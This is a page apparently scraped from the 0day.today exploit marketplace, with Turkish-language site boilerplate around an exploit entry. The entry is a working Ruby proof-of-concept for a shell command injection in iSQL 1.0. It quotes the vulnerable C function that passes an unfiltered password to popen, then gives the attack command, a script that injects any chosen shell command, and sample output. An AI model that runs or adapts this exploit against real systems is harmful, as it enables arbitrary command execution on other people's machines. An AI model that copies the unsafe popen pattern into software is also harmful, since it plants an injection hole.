0day.today - Dunyanin En Buyuk Exploit Veritabani
Bu konuda bilmeniz gerekenler:
Biz sadece bir adet ana domain kullaniyoruz DOMAIN_LINK
Eger exploit satin alacaksaniz ve ya hizmet icin odeme yapacaksaniz, altin almaniz gerekmekte. Biz sitemizi hack amacli kullanmak istemiyoruz, yani her turlu dogru olmayan, kanunsuz ve illegal yapilan eylemler diger hesaplari olumsuz yonde etkileyebilir ve sonrasinda buna yol acan/lar, web sitelerimize ve verilere erisimi tamamen kesilir, banlanir ve hesabini tarafimizca yok edilir.
Sadece bu sitenin yonetimine itibar edin. Sahtelere Dikkat!
Biz sadece bir adet ana domain kullaniyoruz DOMAIN_LINK
Eger exploit satin alacaksaniz ve ya hizmet icin odeme yapacaksaniz, altin almaniz gerekmekte. Biz sitemizi hack amacli kullanmak istemiyoruz, yani her turlu dogru olmayan, kanunsuz ve illegal yapilan eylemler diger hesaplari olumsuz yonde etkileyebilir ve sonrasinda buna yol acan/lar, web sitelerimize ve verilere erisimi tamamen kesilir, banlanir ve hesabini tarafimizca yok edilir.
Sadece bu sitenin yonetimine itibar edin. Sahtelere Dikkat!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Oku [ anlasma ]
- Oku [ Gonder ] kurallar
- Ziyaret et [ SSS ] page
- [ Uye Ol ] profil
- [ FIYAT ]
- Eger istiyorsaniz [ satmak ]
- Eger istiyorsaniz [ almak ]
- Eger kaybederseniz [ Hesap ]
- Herhangi bir sorunuz [ [email protected] ]
- Yetkili sayfa
- Uyelik sayfasi
- Hesap sayfasini geri yukle
- SSS sayfasi
- Iletisim sayfasi
- Paylasim kurallari
- Anlasma sayfasi
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Bize ulasabilirsiniz:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
iSQL 1.0 - Shell Command Injection
#!/bin/ruby # Exploit Title: iSQL(RL) 1.0 - Shell Command Injection # Date: 2016-06-13 # Exploit Author: HaHwul # Exploit Author Blog: www.hahwul.com # Vendor Homepage: https://github.com/roselone/iSQL # Software Link: https://github.com/roselone/iSQL/archive/master.zip # Version: 1.0 # Tested on: Debian [wheezy] # CVE : none =begin ### Vulnerability Point :: [isql_main.c 455 line] popen(cmd,"r"); code is vulnerable :: don't filtering special characters in str value 446 char *get_MD5(char *str){ 447 FILE *stream; 448 char *buf=malloc(sizeof(char)*33); 449 char cmd[100]; 450 memset(buf,'\0',sizeof(buf)); 451 memset(cmd,'\0',sizeof(cmd)); 452 strcpy(cmd,"echo "); //5 453 strcpy((char *)cmd+5,str); 454 strcpy((char *)cmd+5+strlen(str)," | md5sum"); 455 stream=popen(cmd,"r"); 456 fread(buf,sizeof(char),32,stream); 457 // printf("%s\n",buf); 458 return buf; 459 } ### Vulnerability Triger 614 while (USER_NUM==-1){ 615 printf(">username:"); 616 scanf("%s",username); 617 printf(">password:"); 618 scanf("%s",passwd); 619 md5=get_MD5(passwd); ### Vulnerability Run >username:asdf; >password:asdf;top;echo 1 (~) #> ps -aux | grep top root 13279 0.0 0.0 4472 860 pts/1 S+ 13:33 0:00 sh -c echo asdf;top;echo | md5sum root 13280 0.3 0.0 26304 3200 pts/1 S+ 13:33 0:00 top =end ### Attack command #> (sleep 5; echo -en 'aasdf\n';sleep 1;echo -en 'asdf;nc;echo 1';sleep 10) | ./isql ### Ruby Code puts "SQL 1.0 - Shell Command Injection" puts "by hahwul" if(ARGV.size != 1) puts "Usage: ruby iSQL_command_injection.rb [COMMAND]" puts " need ./isql in same directory" exit() else puts "CMD :: "+ARGV[0] puts "Run Injection.." system("(sleep 5; echo -en 'aasdf\n';sleep 1;echo -en 'asdf;#{ARGV[0]};echo 1';sleep 10) | ./isql") end ### Sample Output =begin #> ruby test.rb nc # Exploit Title: iSQL 1.0 Shell Command Injection by hahwul CMD :: nc Run Injection.. *************** welcome to ISQL **************** * version 1.0 * * Designed by RL * * Copyright (c) 2011, RL. All rights reserved * ************************************************ >username:>password:verify failure , try again ! This is nc from the netcat-openbsd package. An alternative nc is available in the netcat-traditional package. usage: nc [-46bCDdhjklnrStUuvZz] [-I length] [-i interval] [-O length] [-P proxy_username] [-p source_port] [-q seconds] [-s source] [-T toskeyword] [-V rtable] [-w timeout] [-X proxy_protocol] [-x proxy_address[:port]] [destination] [port] >username:>password:verify failure , try again ! ^Ctest.rb:10:in `system': Interrupt from test.rb:10:in `<main>' =end # 0day.today [2024-07-02] #